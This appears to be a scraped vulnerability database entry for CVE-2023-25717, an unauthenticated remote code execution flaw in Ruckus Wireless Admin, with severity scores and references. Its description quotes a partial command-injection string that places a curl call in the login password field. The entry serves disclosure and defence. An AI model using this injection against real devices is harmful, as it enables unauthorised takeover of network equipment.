Lucene search

AttackerKBAKB:E0546732-A9C7-479B-ADB0-2FEAD72A66B4

HistoryFeb 13, 2023 - 12:00 a.m.

CVE-2023-25717

2023-02-1300:00:00

attackerkb.com

ruckus wireless

remote code execution

http get request

unauthenticated

cve-2023-25717

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.957 High

EPSS

Percentile

99.4%

JSON

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Recent assessments:

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25717

cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/

support.ruckuswireless.com/security_bulletins/315

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.957 High

EPSS

Percentile

99.4%

JSON

Related for AKB:E0546732-A9C7-479B-ADB0-2FEAD72A66B4